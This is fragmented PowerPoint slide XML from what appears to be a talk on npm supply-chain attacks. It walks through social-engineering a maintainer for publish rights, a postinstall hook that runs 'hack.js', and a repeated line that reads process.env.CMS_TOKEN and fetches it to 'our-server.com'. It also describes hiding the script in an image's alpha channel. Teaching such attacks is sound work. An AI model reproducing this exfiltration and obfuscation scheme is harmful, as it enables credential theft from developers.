            <a:ext cx="1210855" cy="12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43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DF002-CFC8-C41E-6A38-DA0BCD29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8836-6909-3771-509A-2884C0BF3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choose your poison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35758B-A848-B7FC-AA54-C5AE3CFB9D30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2F16-AC4C-2D4C-403B-3D705E241F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="199282" y="4111766"/>
            <a:ext cx="417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phishing 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campaign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44835-C6EC-E087-1ED0-7BEDB782E595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293720" y="2144313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DA7DC-1285-F1D5-6E1D-5BE1FDDFA09B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5030148" y="2153495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E2BC5-EA06-2FE9-3A51-7305522CF843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379273" y="4095073"/>
            <a:ext cx="307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fake tech interview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B58B1-3570-AF8C-FF4A-8904FC255396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8766576" y="2133158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5DB27-1B7A-819A-E567-F6FB1636AC37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7659076" y="4095073"/>
            <a:ext cx="417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v.i.p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6A718FB-75AE-D1CA-506F-60C9BA98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56" y="2370247"/>
            <a:ext cx="1171030" cy="11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DD06C5A-4909-1685-B2D7-A4B3258D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89" y="2470983"/>
            <a:ext cx="1052508" cy="10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4159DA7-5CA5-4484-0A3D-F2173A02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35" y="2383472"/>
            <a:ext cx="1151815" cy="115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5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6DA46-9435-E906-471B-E7621DAFD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7D86-CEE9-67E6-7594-858F12C7B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choose your poison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6DD47D-831B-0D27-1997-E0FE9ED1C175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CB87F-4D1B-D578-967E-EF88E4A38FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="199282" y="4111766"/>
            <a:ext cx="417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phishing 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campaign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DD946-EF03-1DF6-844E-8A6C4ABDD574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379273" y="4095073"/>
            <a:ext cx="307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fake tech interview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DA458-660B-C853-307F-E4108E0DF43A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7659076" y="4095073"/>
            <a:ext cx="417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v.i.p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2B74DC-1B1C-4751-847C-1492987BC2C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293720" y="2144313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1C23F-78ED-FA99-513F-00716D0C4F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5030148" y="2153495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D5856-6CE6-6CC6-C556-CF6C8E2615D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8766576" y="2133158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125D033-2465-DAE8-47F2-0C0258E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56" y="2370247"/>
            <a:ext cx="1171030" cy="11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D63E9E7B-8202-7D32-5186-A0FDF153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89" y="2470983"/>
            <a:ext cx="1052508" cy="10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F6ABD05D-20BF-928D-E08C-6A40B601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35" y="2383472"/>
            <a:ext cx="1151815" cy="115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04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1EE10-46F2-35F8-DDB0-60772A82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DAA6-E675-6DD2-3AA4-4121A35FE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disclaimer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DC5B86F-D795-0554-DFB4-57E2452581AD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FE59B-89A3-5631-2A15-05E00ECD3FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="954058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not an endorsement for hacking bravo tv.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will be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binge watched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below deck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this presentation.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7EDBB-EEC4-189F-515C-28CCEFD0F38D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90907BA-BC04-4000-C772-D5A36C87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82" y="4258141"/>
            <a:ext cx="2279072" cy="22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810EC-E08B-41B2-3E28-C3B02373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2D0B-5244-AC64-0FB8-3CE770A60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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="48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v.i.p.</a:t>
            </a:r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treatment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8AC4E0-908D-1912-D0FF-5C07F902CEF5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9C8B3-6F81-65AF-FC98-46E36A680BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901163" y="2045352"/>
            <a:ext cx="64556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spam the repo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issues using fake github accounts.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 out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responding to the issues, raising legitimate pull requests, improving documentation…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follow the maintainer’s socials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respond to posts to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gain trust and intel.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 descr="Below Deck Mediterranean Recap: Boom Goes The Dynamite - Reality Tea">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEBB29F-0792-F027-B212-ACE9853B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693" y="1832465"/>
            <a:ext cx="2422613" cy="13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Get a Job on 'Below Deck' So You Can Enjoy Some of The Best ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35369EEE-AE82-0409-B11B-C111B6FE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78" y="3350370"/>
            <a:ext cx="26670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low Deck Down Under Season 2 Episode 13 Release Date and When Is It ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E372B3DD-6CB7-D303-EE7D-62267BCE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5" y="4904366"/>
            <a:ext cx="2701636" cy="157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81C6C23-848B-3716-D018-DE46BD692475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6146" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8967355" y="2514507"/>
            <a:ext cx="489338" cy="733736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97F80ED-FC55-43B7-3416-B0FA4F74EC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6148" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10579878" y="4050458"/>
            <a:ext cx="556113" cy="853908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1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D09D3-CF24-766B-226F-2A53464C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9F3B-10FA-DB69-2831-7B101B100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gained access!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3B9E31-3C3E-312F-6947-DA5F890F5EFC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ACEA0-D914-21B2-1557-A0D417192A0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901163" y="2304070"/>
            <a:ext cx="645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 6 months of helping, we’ve been given publish rights!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136FF-8D1E-EB7F-2258-0BF77C7087F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576481" y="3752221"/>
            <a:ext cx="645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the next 4 months, we’re still helping with maintenance…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ADB0A-0B3A-5A72-A15F-F5EFF4DD15A2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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="595374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849E3-1752-56BD-7A3F-AD7A039EB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F20-BC1B-53F9-7854-680FE0475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075" y="-698065"/>
            <a:ext cx="10005848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malicious script flow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D5E093-C5E8-5923-E820-D28BDE332FA7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19888-17B6-0463-B4C7-01BB64811B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865866" y="2112902"/>
            <a:ext cx="646026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 runs `npm install`.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code is triggered immediately.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code sweeps for environment variables matching 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auth token.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token is forwarded to our server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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7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AEF18-1E9D-9EB7-B231-8303C553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4A053-6ABD-4A5C-F283-3A0EE8CF798E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7394034" y="2029789"/>
            <a:ext cx="217924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B6B3B-1065-51AE-8931-8A1309DBF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npm lifecycle scripts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479CA3-7A35-FE53-2BA4-98849C79E04A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77C85-7BB5-D184-0612-30D2C574AD9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825400" y="4764225"/>
            <a:ext cx="6635773" cy="16312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“scripts”: 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20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postinstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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”: “node ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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hack.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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CE1BD-55CE-F9CC-963B-C9EDAD64734A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="9143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packages can run scripts by hooking into the installation lifecycle.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run scripts without the developer being aware or our script needing to be run in the application. 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52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8956F-9360-73C6-6554-07987832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6637-0DF0-DF9D-10B6-008B1ABC0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the malicious script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118859-ECEE-4ED9-3850-E87D947C13C6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23204-4A56-68C1-2BF8-EF1560F0292A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736875" y="2070574"/>
            <a:ext cx="10718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obfuscation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0b4uscat10n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6F62667573636174696F6E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B3C65-37AD-66F6-3A19-FCF81FAC0AE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930380" y="4805105"/>
            <a:ext cx="4190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encode an image with the malicious script to hide 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C3BF-AA89-0901-6942-8893405C0323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6583682" y="4825422"/>
            <a:ext cx="40843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code triggered by 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postinstall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 decode the image and run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AFC7-1E29-B2CD-051F-10D039C7CE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029444" y="3062152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15FE8-B5F5-0F61-A57D-375A1B3BFA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7615994" y="3045264"/>
            <a:ext cx="196499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█▓▒░░▒▓█▓▒░██▓▒░▒▓██████▓▒░██████▓▒░██████▓▒░██████▓▒░██████▓▒░██████▓▒░██████▓▒░██████▓▒░██████▓▒█████▓▒░█████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C898FC-8C38-65A9-DCE1-9D14A8DD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12" y="3266009"/>
            <a:ext cx="1219068" cy="12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35FFA410-AC42-955C-036E-94966155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413" y="3235354"/>
            <a:ext cx="1210855" cy="12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85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4149-7A0F-FC49-9350-F559C2A7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08EB1-1BD7-F67A-922D-6403DBAC917A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5422541" y="-1647825"/>
            <a:ext cx="2442328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89669-3ACA-D8EB-DF9D-162661FE10D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090179" y="2575721"/>
            <a:ext cx="10011641" cy="1706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const token = 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process.env.CMS_TOKEN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fetch('https://our-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server.com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=‘ + token).then(() =&gt; {});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83BC4EAB-CA0D-3620-7BA4-767231351CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605646" y="1187184"/>
            <a:ext cx="1648691" cy="1793853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26EC9A-EFC6-C00D-D2CF-D2D7E5FC3E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299609" y="785032"/>
            <a:ext cx="323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 for the recommended token name from the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docs. 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C8396E6-21AE-11DD-D551-3AD7979974A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6490010" y="3947532"/>
            <a:ext cx="1378510" cy="1637134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EDEE7E-64BF-13F0-0C71-AE32D510CE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868520" y="5123001"/>
            <a:ext cx="323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 up the token as a query string to our server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308746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0ECDB-CB88-97D3-05A3-CDF6C77D3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EB499-448E-91BE-4F6B-9EA1944F7640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="381509" y="1372766"/>
            <a:ext cx="41336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9A560-65AD-29D8-ECC8-C5BC3365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884948"/>
            <a:ext cx="4002809" cy="3088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03F06-3243-AEB5-6D98-F490743097EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829423" y="1351508"/>
            <a:ext cx="5276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image is made up of pixels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pixel’s color can be represented as </a:t>
            </a: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rgba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red, green, blue, alpha channels.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A6F68-AC30-A344-5D0C-F639D3348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23" y="4973052"/>
            <a:ext cx="740064" cy="740064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3CC4082-4765-C75F-4D67-C2C7B24F636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231573" y="2774373"/>
            <a:ext cx="2597850" cy="2568711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FB3E8B-86DF-411C-7EF9-E2148F0C62DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904635" y="4641381"/>
            <a:ext cx="2696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 = 197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 = 125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 = 104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 = 255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020DE2-F62C-D1EF-0E19-AA079F2A7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" y="-698913"/>
            <a:ext cx="7286336" cy="157157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&gt;&gt;&gt;&gt; embedding the script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597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86F05-003D-3BE3-7F2B-617A23E3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93C4D-AAFA-B03F-05A3-E78F6C62D645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7596994" y="2488902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9D193-2266-29AB-D481-FE5FE7883DE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="582791"/>
            <a:ext cx="10011641" cy="1706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const token = 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process.env.CMS_TOKEN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fetch('https://our-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server.com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=‘ + token).then(() =&gt; {});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BB83A-8BDF-703E-FC86-F730140D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3" y="2822287"/>
            <a:ext cx="4002809" cy="30881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CA875D-09F6-B48B-34A2-5748BB337283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825499" y="719859"/>
            <a:ext cx="140856" cy="27766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A6F47A-C75F-99A7-9C88-2E7C22850695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626919" y="2721113"/>
            <a:ext cx="482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the character to its utf-16 code unit, “c” =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81433EC-B537-CCFE-A53A-A655684818A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="626919" y="858693"/>
            <a:ext cx="198580" cy="2185586"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21511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0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E0595-24AE-631C-B4B1-7E207F96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30FF5-CB4E-5A84-21EC-D807391F86B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7596994" y="2488902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40E7C-7EB7-6FA0-5597-5CEDC5F35109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="582791"/>
            <a:ext cx="10011641" cy="1706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const token = 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process.env.CMS_TOKEN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fetch('https://our-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server.com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=‘ + token).then(() =&gt; {});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AE5C4A-707C-AAF9-470F-C2CA910A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3" y="2822287"/>
            <a:ext cx="4002809" cy="30881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D5C88F-EBE0-1CD2-CD65-B0BCFC269943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7562273" y="2822287"/>
            <a:ext cx="124691" cy="13508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B60522-7CA6-FCA7-50E8-87FACB62C105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825499" y="719859"/>
            <a:ext cx="140856" cy="27766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0F3685-DA35-09D7-F37B-B1CA9DAEA980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626919" y="2721113"/>
            <a:ext cx="482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the character to its utf-16 code unit, “c” =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49A22F33-9D5A-15D1-2B34-469C5D4BFA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="626919" y="858693"/>
            <a:ext cx="198580" cy="2185586"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21511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C47215-27B3-C97E-4738-5AC489530CDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2130138" y="3828602"/>
            <a:ext cx="482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amend the alpha channel for the pixel by doing 255 –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156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55723803-16C3-EE8B-E7E1-BA437E10D082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6958447" y="2889828"/>
            <a:ext cx="603826" cy="1261940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0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EE918-A4BA-A382-C51F-DEFEDC9E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EEBAD9-258F-96C5-8D62-84DD0A149463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7596994" y="2488902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87814-59E9-333C-8108-37402F4A20DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="582791"/>
            <a:ext cx="10011641" cy="17065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const token = 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process.env.CMS_TOKEN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fetch('https://our-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server.com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=‘ + token).then(() =&gt; {});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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C4DA1A-BB5E-26E4-17C6-29CAE3A5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3" y="2822287"/>
            <a:ext cx="4002809" cy="30881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D508A0-0E0F-DFB6-EF00-67B59561AF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7562273" y="2822287"/>
            <a:ext cx="124691" cy="13508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D47520-93C8-6FDC-DFD9-CC3F33863C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825499" y="719859"/>
            <a:ext cx="140856" cy="27766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0F5C14-B0BF-ACB0-C2A5-E322E18F114E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626919" y="2721113"/>
            <a:ext cx="482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the character to its utf-16 code unit, “c” =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22CB8FB-3D91-B9E2-45B5-27BB2458803A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="1"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="626919" y="858693"/>
            <a:ext cx="198580" cy="2185586"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 215117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6BCEB4-5150-CD9D-A2D0-77FEBB1C76D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2130138" y="3828602"/>
            <a:ext cx="482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amend the alpha channel for the pixel by doing 255 –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156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D04AC1E7-FFEC-EA82-BF65-C94AA15DA2C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6958447" y="2889828"/>
            <a:ext cx="603826" cy="1261940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62125A-15F5-473B-02D4-A4C537509E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="966355" y="4936091"/>
            <a:ext cx="497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the process until script is fully encoded in the image.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145065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60338-0EFC-F96B-069E-A80535CD0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E1A384-DD3B-B161-5685-E2C875293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897386"/>
            <a:ext cx="9144000" cy="160727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b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D96B3-B822-1251-AF99-32A3405DC59F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3044806" y="1921398"/>
            <a:ext cx="610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manager + registry with 3m~ packages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FA7FAFE-5596-5E85-B5BB-F4F644FF8FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3555177"/>
            <a:ext cx="9144000" cy="160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b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23C48-A207-6C52-941F-84FF28450CB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253652" y="4565591"/>
            <a:ext cx="5684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*functionality to be used in a project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272052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7F177-A915-0B61-AA15-CD3D3BC9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4AECCD-8503-0B0C-A7E8-A4FECE6648C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5350217" y="819906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6331D-2373-C536-23DA-A40D92A5E235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="289244" y="771376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42AD7-D6E8-0A89-E2CE-E5F41D6B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3" y="891880"/>
            <a:ext cx="4554682" cy="351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8A759-6AE2-CF53-3623-7C1194EC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891880"/>
            <a:ext cx="4554682" cy="3513866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21506" name="Picture 2" descr="Corporate wants you to find the difference between these two pictures.&quot; :  r/petsmart">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D113B5-189F-DBFD-2F21-5D5D7468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35" y="4644735"/>
            <a:ext cx="3369881" cy="19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0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A0884-B602-56B6-E4E5-3A77F2E4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E8AA86-A797-AB33-6F0D-1ABCDA079266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
